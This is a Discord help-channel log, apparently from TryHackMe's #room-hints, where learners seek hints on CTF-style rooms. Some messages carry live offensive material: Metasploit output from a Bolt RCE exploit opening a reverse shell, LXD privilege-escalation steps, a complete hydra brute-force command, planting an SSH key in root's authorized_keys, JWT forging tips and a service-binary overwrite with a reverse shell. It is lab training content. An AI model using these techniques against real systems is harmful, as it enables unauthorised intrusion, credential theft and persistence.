#room-hints
1 messages · Page 65 of 1
Yes it is mentioned in the above link
or cd $HOME
Who the heck has ever typed cd $HOME
cd on its own works
Hey guys, has anyone completed the 'Attacking Kerberos' room? I'm stuck on task 7 but I'm not sure what I'm doing wrong.
Hi there looking for a hint with the room GraphQL, question 1 task3 (pretty sure my query is good but can't find out after hoooooouuuurs). Thanks
Ignore my question - I figured it out.
I'm doing the Wireshark 101 room, am on the HTTP portion looking for the URI data stream, and confused on where to find it. Any hints?
Kana helped me tyvm
Anyone done graphql room?
It's always best to just directly ask your question.
If someone can help, then they will.
Can't find the flag
In graphql for user Para
If there is one
Lmao, nvm. Sorry. I was looking for a flag. Got the hash.
can anybody help me in nerdherd
#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:
- What room you are on
- At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
- What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done.
I am stuck at the Enumeration part, I found some encoded strings, unable to decode one of them
have a closer look at ||the image you found in the ftp|| @grim heron
Hello! I'm currently doing the Bolt room and I think something's wrong with my metasploit.
[*] Started reverse TCP handler on 10.9.190.109:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable. Successfully changed the /bolt/profile username to PHP $_GET variable "hutayc".
[*] Found 3 potential token(s) for creating .php files.
[+] Deleted file mvfpeduf.php.
[+] Used token 9122f8ad27851994cb54bab4d0 to create hmmprqdzr.php.
[*] Attempting to execute the payload via "/files/hmmprqdzr.php?hutayc=`payload`"
[*] Command shell session 1 opened (10.9.190.109:4444 -> 10.10.233.64:58770) at 2020-11-05 21:25:31 -0500
[!] No response, may have executed a blocking payload!
[+] Deleted file hmmprqdzr.php.
[+] Reverted user profile back to original state.
^C
Abort session 1? [y/N] n
[*] Aborting foreground process in the shell session
So I'm still waiting for it to connect
Can you explain foregrounding? What is that? 
Control Z to background the session
I did that.
Then sessions -i putTheSessionNumberHere
msf5 exploit(unix/webapp/bolt_authenticated_rce) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/unix 10.9.190.109:4444 -> 10.10.233.64:58770 (10.10.233.64)
msf5 exploit(unix/webapp/bolt_authenticated_rce) > sessions -i 1
[*] Starting interaction with 1...
Should I reboot the box or connect to it using SSH?
Surely you can't use SSH?
I didn't try
You don't have any creds that work for SSH
Don't I have the username and the password?
You probably don't have a prompt but do have a shell
Or those are just for the CMS
Don't I have the username and the password?
@distant violet For bolt yes, they shouldn't be the same
It's a different service
But I cannot get to connect, so should I terminate, and deploy again?
You probably don't have a prompt but do have a shell
@stuck fractal
Oh
it did connect
So what do I do now?
/bin/sh: 2: id: not found
in fact yes, help does work
So you can use that shell to get a more stable shell
whoami root
Is SSH open?
Yes
My recommendation would be to add an authorised key to root and then try to SSH in from another terminal tab/window
That's hard, I think
That gets you a MUCH more stable shell, with the caveat that it only works for users with SSH enabled
It's not very hard
Shouldn't I just try to get the flag through the msf?
Copy your public key into /root/.ssh/authorized_keys
You can
But that shell is a pain and doesn't give you tab completion ETC
A full ssh session is more stable and more interactive
I am able to ls and everything, but I cannot seem to find the flag.txt
Never mind, I did cd .. a few times and I found it
I tried to use it and I just did "find flag.txt"
I wondered why it didn't do anything 
Well, thanks for the help. 
locate follows that kind of syntax but works slightly differently
I kinda need help installing john. Could you help me or isn't this the specific channel for this?
It ships as default with Kali, but #infosec-general
Hello again! How could I upload an alpine.../.tar.gz file to a server?
#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:
- What room you are on
- At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
- What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
Hello again! How could I upload an alpine.../.tar.gz file to a server?
@distant violet there's some great articles for it.
@stuck fractal I don't really know how I could google this
Package lxd is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source
E: Package 'lxd' has no installation candidate

You need to very carefully consider where each command is being run
What do you mean?
You gave no context with the error message
root@andrew:~# sudo apt-get -y install lxd
Reading package lists... Done
Building dependency tree
Reading state information... Done
Package lxd is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source
E: Package 'lxd' has no installation candidate
Does this help?
You don't need to install anything on your machine afaik
@stuck fractal Then how could I run lxd?
Where are you trying to escalate your privs?
On the room Gaming Server, I'm trying to use lxd to escalate privileges so I can get to root.txt
Well, how could I sudo on the server
I mean I have to build alpine, right?
Yeah, use the script
The article explains this
Cloning into 'lxd-alpine-builder'...
I think it hung
Read the exploit and make sure to be on the right machine for each step
Wait, so I should download alpine-builder on the attacker machine or the remote machine?
Your machine
I did this.
The target machines do not have internet
I have alpine downloaded, and have built it
But LXD isn't working on my machine
You should be able to follow the instructions in the article
If we are talking about the same exploit then you can see:
# Step 1: Download build-alpine => wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine [Attacker Machine]
# Step 2: Build alpine => bash build-alpine (as root user) [Attacker Machine]
# Step 3: Run this script and you will get root [Victim Machine]
# Step 4: Once inside the container, navigate to /mnt/root to see all resources from the host machine
Indeed, we are talking about the same exploit. So how can I transfer the script to the victim?
You don't
So, I run it on my own machine?
apt update and try again
Otherwise #infosec-general for help installing lxd on your machine
Same error.
Nmap room
What switch should I include if I don't want to ping the host?
Can I get a hint
Have you checked the nmap manual?
Control F ping?
Search for ping
anyone for a tiny nudge on keepers key task 2.3 for psycho break? saw reference in source to the nightmare. tried searching through everything, stego and exif techniques on every picture, searched through the stylesheet, etc, couldn't find anything. hint is appreciated.
i'm doing the room right now
i'm still mad at how deep it is
i actually can't believe this is the right way to find it
Hey there, i'm experiencing an unusual problem.. room "Web Scanning", task 3, question #8
is it normal that i can't find the right answer in the alert tab?
which room? i couldn't understand your question, elaborate it more
scanned like 10 times already
ok... so how can we possibly know the answer just by doing the room?
ow, ok thanks! i can't see that issue on the room. that's why i asked
I need help with this one
I have 0 idea on what to do
LOL
and it's the only thing that I have left before I move on to the other machines =))
which room?
Web Fundamentals > ZTH: Obscure Web Vulns Task 25
any help on 'year of the dog'? i've exploited the c****e, but only got a list of IDs and positions.
P.S. the 2nd writeup by Hackster is fake?
@wicked rain did you know you can dump the result of a MySQL query to a file?
@young tide that looks like JWT
P.S. the 2nd writeup by Hackster is fake?
@wicked rain it was like troll for me.. I just opened it XD
any help on 'year of the dog'? i've exploited the c****e, but only got a list of IDs and positions.
@wicked rain same here.. idk what to do with that
@indigo ridge check @cedar axle 's hint above.
I still need some hint on YOTD
@indigo ridge pay attention to the errors. some attack is mentioned. combine it with above hint and do some research.
@cedar axle it is and I already know how JWT tokens work I just have no idea how to decode the signaturesecret
@young tide there is a npm package for that.. use google
I need help with YOTD too. Got to ||gitea|| already but really puzzled about what to do with it.
@eager flicker google git hooks
@young tide damn, that's a premium room, can't help, I'm a poor student. i live on packet noodles
@indigo ridge something like this?
https://puu.sh/GKFDp/63f67e61e9.png
@cedar axle aye, one of these days you'll get that premium room. I just grabbed it to test the skills that I've learned from a certification body and so far so good, the only thing left for me is the one that I asked about and the juiceshop
change the alg and send it back
jwt-cracker if you need to crack something
I don't have access to the room, but if the algorithm is none, jwt just uses plain base64
yeah, it could be a weak secret or you just alter the alg to none
not sure exactly as i cant run the lab
1st is the header which has the typ: none
2nd is the payload
3rd is the secret I need to get the secret
xD
ignore all my posts
haahha no worries but thank you still for trying to help
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.it4Lj1WEPkrhRo9a2-XHMGtYburgHbdS5s7Iuc1YKOE
that's the exact token LOL
Is that an answer/ something the user needs for a room?
Oh it's the example
that's the last challenge
LOL
but yea dark rider already answered my question
it was just right in front of me and I just read about it before the challenge
=))
@young tide jwt-cracker worked for me
Thanks @cedar axle yes that was the one that was needed
took me like 7 hours for that question and a hint
OMG
sometimes it's the trivial sh#t that trips you over
meh dont worry
Hey guys,
WackoPico Web App Room, does usernames extraction require using burp intruder ?
??
What's the room code?
What task?
If you meant username enumeration the answer is it's not required although doing it manually might take you hours or days
What task?
@woven mirage Task 4) Question #4
If you meant username enumeration the answer is it's not required although doing it manually might take you hours or days
@young tide haha yes thats the problem
I just looked up the writeup
Well, you can use burp intruder if you want to brute force
But you can find users without brute-forcing at all
Try to create a user and check how you can exploit a URL param in one of the pages to view info about other users
Np
Any hints for Year of the dog room? I'm not yet a d***n user and know about additional service, not sure how to exploit it. Any suggestions?
Hi.
I just achieved a 45 day streak and I saw that I got 5% of swag. What does it mean?
You get a 5% discount @ https://store.tryhackme.com/
Email support@tryhackme.com to receive your code
Thank youu!
@narrow barn make sure you check all the files you might have dismissed, I did the same thing
you have work to do, files to analyse
got it, Thanks @cedar axle
Any hints for Hogwarts room please?
That's a KoTH box, rather than a room
As it changes every time, it's hard to provide hints
Quick question. In Hackpark room, was it intentional for admin creds to be openly available with winPeas?
I feel like I cheated >.<
iirc yes
I feel like that wasn't the intended path but it was there and they just left it
Wait wut
You mean, i spent all those hours
And priv esc password was just there
Msh
I feel like it wasn't the intended path BUT winPEAS yelled at me with autologon credentials
After fumbling a little with metasploit I decided to just rdp with potential credentials. And there I was NT Authority System@frail rain
hello
Can someone give me some hint how to crack the password in this Brute room
i know hydra but line of command . . . . . . . .
@magic gale i'm trying for about 2 hours now
It's a new room. Hints/help are allowed after 72 hours of release.
hydra -l admin -P ~/Desktop/rockyou.txt ip http-post-form "/admin:user=^USER^&pass=^PASS^:Username or password invalid"
i'm getting multiple passwords, and those are not working, am I doing it wrong? please suggest
this room has no hints till it's 72 hours old
Is this the hydra or brute it room?
brute it room
Two things guys, first we try to avoid hinting on new rooms for the first 72 hours, secondly if you are going to post spoilers please surround them with spoiler tags, ||, on either side of the text
And for clarity, the exact syntax of a command is a spoiler
Room Js basics
Task no 5 question no 2
Any hints please
add something to your first word
Ooooo gotcha thanks a lot
@kind bear @stark rapids please do not ask for or provide hints or help for 72 hours after the release of the challenge.
This is under Rule 13.
It's a challenge room, is it not?
yeah got you, so if for a walkthrough anyone has any questions we can ask right
yeah i got it, i'm asking in general
The 72 hour rule applies to challenges.
hydra -l admin -P ~/Desktop/rockyou.txt ip http-post-form "/admin:user=^USER^&pass=^PASS^:Username or password invalid"
@stark rapids what room are you on
Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.
Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.
that wasn't a hint but k
hello, i'm working on the burp suite room...i'm on task 11 and i'm lost on step 1..."Let's first take a look at decoder by revisiting an old friend. Previously we discovered the scoreboard within the site JavaScript. Return to our target tab and find the API endpoint highlighted in the following request:"..... i am confused about this scoreboard reference, I went back through the entire room and can't find any information on it and it's not showing up in my site map...
the score board is here @stark parrot ||http://10.10.XXX.YYY/api/Challenges/?name=Score Board||
ok...how would i have known that?
when did we previously discover the scoreboard?
my burp crashed on one of my previous steps... i had to restart it
honestly I don't remember, I've used juiceshop a lot in the past though and i know it from there
its possible i lost some information when that happened
i just want to understand what i missed
really frustrating, as i've gone back through the burp suite room multiple times now and see no reference to this scoreboard they speak of
cool, the room references a task not otherwise discussed in the room. makes sense
thank you for the help
so i don't understand the preferred course of learning then. why isn't this covered ahead of time? i'm following the course under dashboard, completed welcome and metasploit, moved to Vulnversity and was sent over to the burp suite room as a prereq
this is all very confusing for someone who just wants a progressive path
they speak on the scoreboard as if we covered it in the room but we didn't.... lol
am i starting at the wrong spot?
what I will say is that the very first lesson this site tries to teach you is to research
a quick google for "owasp juice shop scoreboard" will answer your original question for example
no, just be patient and keep at it, and always be prepared to fill in the gaps with a little googling outside of the provided content and hints
some discord problems there, seems like half my messages got lost
i think. i definitely appreciate you helping me through this
you can use #room-bugs to leave some feedback on the room if you want
a community user's tutorial?
keep at it and you'll get there, patience, time and persistence pay off with this stuff
anyone i can ask on nmap room? stuck on task 1 number 3 lol
thanks!
Hello guys! I hope you are doing alright!
Yesterday I tried "Jack" (https://tryhackme.com/room/jack).
I checked the writeup to see how to escalate privileges in WP and all of them are exploiting a plugin.
But neither with wpscan nor after logging in am I able to find the plugin.
I finished the room but still fail to see how people found that plugin
I know what you mean. Did you check the possible commands and options you can use with wpscan?
first time using wpscan
I check the help command and found:
-e p and ap
I tried popular plugins first -> no results
I tried all plugins -> no results
@bold star the plugin is called User Role Editor
As far as I know wpscan enumerates the plugins with passive detection. There is an option to change that. Try this with the most popular plugins :)
I know the plugin by checking the writeups and the rest went smoothly.
Thank you @true prairie! I will check the options again
You are the best! It was at the end of the help screen
Now I managed to find it
10/10
No problem
hey all need a nudge on root for break out of the cage. got the || encoded string in cage user's email_3 || i assume it may be || vigenere cipher like last time|| if so any nudges on getting the key? if not a small nudge in the right direction? thanks
Do you have a key for the first cipher text?
yeah, it's not the same key
What tool have you tried to decode your cipher text ?
I've just been using cyberchef
There is a website for cracking it without a key
Hey guys! Hope everyone is good! I'm in the middle of room Brute IT and stuck in task 3 question 1 what's user:password of admin panel, tried to brute force it with hydra but getting false positive results can anyone give hint?
Vigenere solver iirc
bruteforcing the key doesn't work
But if I remember, you can find the key with
??
That's weird. I used vigenere solver. Don't know exactly if it was a variant. Might have to check it again
@wicked plaza That's still a new room, please wait 72 hours from room release before asking for help or hints
key for first cipher was like twelve characters
even if it was bruteforcable i really would prefer to do it legit
a nudge from someone who has actually done the room?
Without brute force you should read through the email again. It isn't really a key but a word that really gets mentioned noticeably
Not a problem. Felt stupid as well. Seems so obvious looking back at it
Hey guys is there any tutorial to do privilege escalation using "cat" command?
#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:
- What room you are on
- At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
- What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
@untold elbow https://gtfobins.github.io/
I really hope this isn't for Brute It
i dont know the question wasnt specific
That's why we asked for clarification
oh i c
Hey I am running into an issue with the brute it room. I run hydra and get 16 usable passwords but none of them work
You are using the wrong command and it's giving you false positives most probably
Can't actively help with the room as it's not 72 hours old yet
i am working on the blue room, it seems as if my metasploit defaulted to meterpreter instead of shell... is that normal? a new default maybe?
using windows/smb/ms17_010_eternalblue
ok, Thank you
Any Brazilians here?
English please.
hello I am working through steel mountain room, currently on task 3 step 3, it says i should be able to overwrite this service ACSService.exe
but when I try to move my reverse shell executable and overwrite it, i get access denied
dirp, i need to stop the service
Hello! How is everyone doing? I just learned Privesc on Linux in the Complete Beginner path and I wanted to practice it on a room. So someone advised me Wonderland but I'm stuck right now
I successfully logged in to the alice account and performed a LinEnum scan. I tried some suid files, checked cron, checked /etc/passwd but no luck.
I think I need to horizontally escalate to find user.txt as I think it is in the rabbit directory but I'm running out of ideas.
It's something you'll find very quickly with enumeration, but you might not know how to exploit it
Do I need to put this aside and come back later when I learn more about linux and/or privesc?
Nope. You can probably find a method with a couple google searches about what you're seeing
Something relatively obvious now that you're logged in as Alice. Something you should always check for privesc.
I'll put the next sentences as a spoiler if it's okay. I'm not sure about what you're talking about
sudo -l is awesome
Something you should always try
Then it's a matter of researching what you're seeing
|| Do you mean sudo -l? I saw something like (rabbit) python3.6 but I don't know what does that mean and how to use it indeed ||
Alright
I was right then. I need to check if you're right
Oh and thank you btw James! I'll check that out
Hi, I am stuck at Empire room Module 8 Question #2. Is anyone willing to give a hint? I tried with results from mitre based on empire software but no success
Nvm found it
What's the format for john when attempting to crack an id_rsa? is it john hash.txt --wordlist=rockyou.txt ?
well what response do you get?
and is the rockyou.txt file in the directory you're executing the command in?
hello everyone. in the linux challenge room task 2 #4. I'm getting an error trying to open up a specific file saying I don't have permissions. i went into a specific folder where the cronjobs are created and i see the file or folder or whatever it is and i can't access it
please gimme a hint
i already went back to bob to see if he had privileges but he doesnt
It's a different place
It's a file you definitely have permissions for
Keep looking
James, I don't want to give away anything, can I message you privately
No
okay ill go look elsewhere
I put 99% odds on you currently looking in like, var/spool/cron or something
Which is where the cron processes start or something
But not where they are created
It's a rabbit hole
just tell am i going the right way for final challenge or not
That file is not the right thing. So no
oh
Do you understand what a rabbit hole is in CTF?
I'm trying to grep for the characters c9. so i used this command find / c9 | grep c9
but its coming up with alot of unnecessary stuff
That would be finding files that contain c9
I'm assuming you're doing the one that wants what is in the file to be c9
yup
So I'd suggest looking a bit deeper into how to use the find command
Cuz that's not doing what you think it is
okay thanks
Files that contain "c9" in the file name, more accurately
trying to finish the last task for steel mountain where you use powershell, winPEAs to compromise the system instead of metasploit
i'm having a hard time with the web server setup
or i was able to get http.server up on 8000
but it doesn't seem like its working w/ netcat and the python script
SyntaxError: EOF while scanning triple-quoted string literal
Did you download it to the target?
what the hell is the secret spicy soup recipe
i swear it's not anywhere on the website and it's not anywhere on the machine, i am about to lose my mind
???
@dull pulsar @halcyon bison Please bear in mind rule 13. No hints or help on new challenges for 72 hours after release
whoops sorry
My bad
!rule 13
Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.
Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.
?
As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator. Applies to everyone.
I'm not giving any answer, just jk
Giving answers is against the rules under cheating anyway
But just... don't engage
He said "
nevermind im just blind my bad
But just... don't engage
Ok, sorry about that!
guys, I'm trying to solve the room advent of cyber. Right now in day 1. When I try and decode the value of the cookie for the 2nd question. It says incorrect even though I've verified through hash identifier and it turns it to be base 64. am I going into a rabbit hole?
It is asking for the static part, right?
There's one part that changes, and one part that stays the same.
Yeah
So there's part that varies by user.
And a part that is constant.
Create a new user account and you'll probably see which is which
@uneven kayak That's still a brand new room, please don't ask for help or hints for 72 hours after release. This is under rule 13.
ah sorry, didn't know that
Has anyone done Internal from the oscp path?
It's always best to just directly ask your question.
If someone can help, then they will.
I've been searching for paths, creds on that box for a while but can't find anything.
could someone give me a hint for Startup on how to get access as a user.
i have a shell as www-data
#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:
- What room you are on
- At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
- What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done.
Also it's a new room.
oh
Hints/help are allowed after 72 hours of release.
okay
Hi everyone, can anyone give me a hint for wireshark 101 room task 7 question 4. I have tried and searched a lot but can't find an answer for that format
you need to filter the packages
Which packet I tried a lot
I have seen like a reply packets but not sure what is the answer
there are some reply packages you need the id of them
I found some like 3 packets but canโt find the answer
there are more reply packages
@prisma blade share photo of task
I'm stuck on the same room at a task, need to verify if it's the same, then I can tell you the answer @prisma blade
We don't share answers
can you share questions?
without the answer yes
i think that's what he was asking
hey i am trying to solve startup and currently stuck at root , i tried a number of things deletion, rev shell, export root etc.. but no luck can anyone shoot a hint
I'm stuck at user
it's a new room guys and not 72 hours yet
oh ok i got the link from a friend, didn't check
can i hint
for?
nmap room?
yeah
Which question and task
You need to be specific because we don't know where you're stuck
ask!
task 1
What networking constructs are used to direct traffic to the right application on a server?
question no. 1
p
thanks i got it correct
Anyone completed Startup room ?
that's a new room @limber iron, no hints allowed for the first 72 hours
@median compass sure i'm just asking
yes, I finished it, lots have I'm sure
Can i dm you about something please ?
is there limit asking for hints?
only for new boxes @hidden fractal
sure you can @limber iron, still no hints though
Question:
What if I want to run all scripts out of the vulnerability category?
nmap
did you try putting those exact words "What if I want to run all scripts out of the vulnerability category? nmap" into google @hidden fractal? within a couple of the top links I can find your answer
if you want to learn then google skills are pretty important, it's worth looking for yourself, you'll learn a lot more that way
@median compass i searched "vuln nmap"
oh ok thx for the tips
I'm just not used to googling
it's just practice, the more you do the easier it gets, keep at it
you should do the google dorks room
does the linux final challenge have something to do with "man page of sudo is very nice"
linux beginner last question
you mean the "Learn Linux" room?
do you have the user ||nootnoot|| ?
no, I'm trying to get into every user
to see
I'm trying every user name and password i see
in there
let's see if one matches
and trying to get into hidden areas
using find
ok, one good strategy in general is to look for every user that you do have for files that they own ||find / <-user/-group>||
don't look at the spoilers if you don't want them, that's why they're hidden
ok
one of your existing users has a file in an odd location, happy hunting
hmm
and eventually yes, sudo is part of it, to answer your original question
@median compass existing means shiva1-4 ?
shiba1-4 yes
what file?
not sure what that is - you've already used find in Task 31, question 3, just use that with your shiba users, one file should pop out for you
is it normal that nmapping takes so much time?
it can do @hidden fractal, depends on how the box you're scanning is configured
is it not about wifi or anything?
No, it's usually not
What options are you using
@final mortar -A
-A takes time, cause it's discovering a lot of stuff
Just like a full port scan -p- takes time
You can use -vv so check how much your scan is done, what ETA and stuff like that
You can also speed up your scans with -T4
you can try rustscan too @hidden fractal, sometimes having different tools for different situations is a good thing
if you just want to list open ports masscan is good
#infosec-general ask here.
what is the meaning of rabbit hole in case of ctf can someone explain ?
a rabbit hole is something that looks like a useful direction to find an exploit but actually goes nowhere
oh
they teach you to not stop looking for ALL interesting things just because you find one
rabbit hole = red herring
@median compass i looked for every user using command i used every user except shiba4 is same
but shiba4 is already used
and sometimes im getting pam auth error
I'm in the Linux Challenges room and I'm trying to find all of the flags. #9 says to look at the hosts file. I feel I need to use sudo commands, but neither Garry nor Bob is on the sudoers list. So I was going to edit the sudoers list, but it won't let me.
and cannot login anywhere
Am I going about this wrong?
Read the host file. No need to edit it.
Yeah...just figured that out. Ty
I tend to see every door as needing to be kicked in. I lost sight of what I should have done.
@small oracle try as user ||shiba2||, you'll find a file in an odd place, ||/var/log||
I have started that room myself and verified this, it's definitely there
hello, i'm still struggling with this SteelMountain room, specifically access and escalation without metasploit. so I did some googling and everything is telling me to start SimpleHTTPServer on port 80. Can't get that module to load in python3, so run python3 -m http.server which works but won't start on port 80 cause something is already listening on 80. Box shows 2 processes listening on port 80, when I kill them both, my attackbox becomes immediately inaccessible... what am I missing
i think you want to be running the web server on your attack box @stark parrot, the purpose of the server is to allow the exploit to pull across nc.exe
understood, thats where i am trying to set it up
but there are 2 process already using port 80
and everytime i kill the process, my attackbox is un-usable, i have to reboot it
oooooooo interesting
ahhhh you're not on a VM, gotcha
If you use it in the small window it seems fine. Might also be able to SSH in?
let me test
very interesting lol
root@ip-10-10-177-226:~# python3 -m http.server 80
Traceback (most recent call last):
  File "/usr/lib/python3.6/runpy.py", line 193, in _run_module_as_main
    "__main__", mod_spec)
  File "/usr/lib/python3.6/runpy.py", line 85, in _run_code
    exec(code, run_globals)
  File "/usr/lib/python3.6/http/server.py", line 1211, in <module>
    test(HandlerClass=handler_class, port=args.port, bind=args.bind)
  File "/usr/lib/python3.6/http/server.py", line 1185, in test
    with ServerClass(server_address, HandlerClass) as httpd:
  File "/usr/lib/python3.6/socketserver.py", line 456, in __init__
    self.server_bind()
  File "/usr/lib/python3.6/http/server.py", line 136, in server_bind
    socketserver.TCPServer.server_bind(self)
  File "/usr/lib/python3.6/socketserver.py", line 470, in server_bind
    self.socket.bind(self.server_address)
OSError: [Errno 98] Address already in use
root@ip-10-10-177-226:~# lsof -i :80
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
python 1458 root 3u IPv4 28104 0t0 TCP *:http (LISTEN)
python 2349 root 3u IPv4 28104 0t0 TCP *:http (LISTEN)
python 2349 root 4u IPv4 33280 0t0 TCP ip-10-10-177-226.eu-west-1.compute.internal:http->ip-10-100-2-28.eu-west-1.compute.internal:39676 (ESTABLISHED)
when i kill process 2349, immediately lose my attack box
so i can't bind anything to port 80
i guess maybe i should look at using my own vm
same problem if i use split screen view on the VM
if you ssh in you'll lose the GUI when you kill that process but you'll still have a command line and be able to continue
@median compass You'll lose access to the gui from the fullscreen/splitscreen
It still exists etc
sure, they'll have lost it though, I was simply making it easy
Hey guys, I am gonna need a little push on https://tryhackme.com/room/basicpentestingjt on the last task
||I tried uploading files via smbclient since the staff.txt file made me think I could, but the smb.conf doesn't look like I am allowed to write to any share?||
don't think that's the route @flint lintel
try ||looking for interesting files in the other users home directories perhaps||
@median compass ||oh is it more related to ssh now?||
Thank you!!!
hey
Oh...servers must be back up.
I'm struggling with the MOTD in the Linux Challenge room.
I've seen 2 places where the web says the files are, but they aren't there.
cd..
lol
where have you looked?
/etc/motd and /usr/bin/scripts
when i google "ubuntu motd files" the very first link gives me the right location, try it
morning gang. i could really use a nudge on privesc for willow. found ||creds|| in ||/mnt|| having trouble finding a way to mount this device, but have additionally tried googling ways to view a partition without mounting. finally my concern is i should be looking at something else. afterall, ||/mnt/creds|| is a directory and not a disk. any help appreciated
So, flag13 is somewhere in the 2 scripts of the Titanic movie. I tried to do an egrep to find flag, and it only found the flagpole to which they clung.
Would grep work for this?
Can I use it to compare the 2 easily?
I think it tells you to use diff?
@rose cape, anything mountable can be found in ||/dev|| have a look there to see if anything jumps out
looked there, i guess i didnt look hard enough! thanks @median compass
Didn't realize we had a diff command. Popped right up. Ty
I found the kernel version! Woohoo!!
I'm really not sure what I'm supposed to do with that. I'm trying to see if there are other ways of finding that info with the hope that there will be something nearby to show me the way.
That's for a specific question in Linux Challenges right?
Yessir
There's multiple ways to find the kernel version
And there's a flag that you'll get with one of them
Yeah. I have the kernel
Yeah. I was hoping it would be like that.
That's a bash/shell glob
yeah. got it.
Look into that and you'll get the flag
ty
Cool, good luck for the rest!
I saw mention of the first part of that file and knew what I needed.
I'm doing a whole lot better with this than i was. I'm loving it all the more.
Something that I've noticed is that most flags, when you go to enter the info, require one hand on alpha and one hand on numeric. Was there a reason for that?
They're md5 hashes usually?
Usually you copy/paste them
SSH in and you can actually copy/paste easily
thx
how do i search a process thats using a port. i tried ps but couldn't find it. some reason my meterpreter decided to make 5 sessions on multiple ports
i have a meterpreter on blue on 445 right
That's the RPORT
and now im trying to use shell_to_meterpreter
it converts a plain shell to a meterpreter
or type shell
You don't have a plain shell, and you already have a meterpreter
why is the ctf telling me to do that?
because metasploit changed the way default payloads work
Side note: It's a room, please call it a room
Not all rooms are CTFs
You're already nt authority.
wait now im able to getsystem before i wasn't#
how do i know which hash it is btw? i tried hashid
@white salmon may be dumb but have u tried hash identifier ?
@white salmon Context is the best way
You dumped it from a windows system's SAM file, it's going to be NTLM or LM
i mean i should have noticed the machine lol i was being dumb
how do i word the hash into a textfile though i have never cracked a nt hash before
You place the string
do you include the entire string
i tried too but its just on cracking not placement of the hash
Find a better guide then
You need to identify what part the hash is
then put it in a text file (or find a different way)
true i'll look
you can just yeet the entire thing into a file
or you can use the hashcat example hashes
that will help you understand the parts of hashes and what each one looks like
or crackstation because ntlm is rainbow-table able
yeeting the entire thing into a file worked lol
Can someone give me a hint what a "flag" is? What am I looking for?
Asking for Task 5 Find Flags room/blue
flags are little pieces of text hidden in the rooms at certain points, when you've gotten past a certain stage the flag is your reward and proof that you got there
sometimes they're in a file (often flag.txt, or user/root.txt)
or they can be hidden in another file
usually they have a recognisable format, like THM{ text }
where do i find the bin/recycle directory on windows machine
better yet how do you use a command like find on windows?
Have you googled that?
i haven't lol
One of the most important skills in infosec is research
You are expected to do your research before asking here too
i do but sometimes i get the wrong answers on google
get better at googling is honestly the only answer to that
google doesn't mess up, your query does
im trying to complete them without watching the videos
thx @median compass
could i get a hint on the 2nd flag T5 i checked bin
I wish I wrote down where I kept my password. Luckily it's still stored here on Windows.
Where are password (hashes) stored in windows? Have a look there
Hello. In room 283 (Network Services) Task 4, when using smbclient I am trying to get the information and put it on my attack machine. The command I use while in smb is "get "Working From home Information.txt" interesting1.txt". The response I got was NT_STATUS_DISK_FULL. When I look on my attackbox it shows that the file was transferred into interesting1.txt but there is nothing in the file. Can provide a screenshot if necessary. Is this a memory issue for my VM?
Storage issue with your VM most likely
Also, the rooms aren't numbered?
IDK where you're getting the numbers from
It seems like they're getting the numbers from the upvotes of the room
ah thats what i thought the number was
Rooms are identified by their titles, and uniquely identified by their room code (the portion of the URL after /room/)
Well I changed the storage in my vmware settings and it now has me using rolling kali tty1. troubleshooting how the heck that happened
Hello guys, just a question, in many paths they refer pass.txt
After tons of wordlists i couldnt crack the hashes
Any idea of specific wordlist or where pass.txt is located?
My own attack box (ubuntu)
ok, in most of the THM rooms passwords are used from the rockyou.txt password list
Tried that!
well, in some rooms the hashes aren't crackable
in that case there's always another way to get where you need to be
Its the off sec path, so has to be crackable
like, if i just take 16 completely random characters from /dev/random you'll never crack it (edit: not with a wordlist at least)
what room is it?
Under the path off sec
The active directory/ kerberos
But i ve seen it in other rooms as well
Working on Linux Challenges. I'm up to flag21.php. Trying to figure out how to display it. I used cat and it got the message, but, I guess I'm at a loss as to what I need to do. Got a nudge for me?
well, you can try seclists too
Use rockyou unless you're told otherwise @lyric crystal
they have good lists, but yeah, it's usually rockyou if it will crack at all
I ll try it again guys, thanks, already used most of the seclists
then you also have to be sure you're cracking against the right service, like hydra may get nothing against SSH but succeed against SMB
I started to pull up VisualCodeStudio. Then realized I couldn't move the file. I've tried opening it in web browsers.
Already collected the hashes and recognized successfully by hashcat
Im not that stupid lol
We are all that stupid. We start somewhere
that wasn't my implication, it's not easy to cover every possible scenario on the information given
Anyways..thanks again!
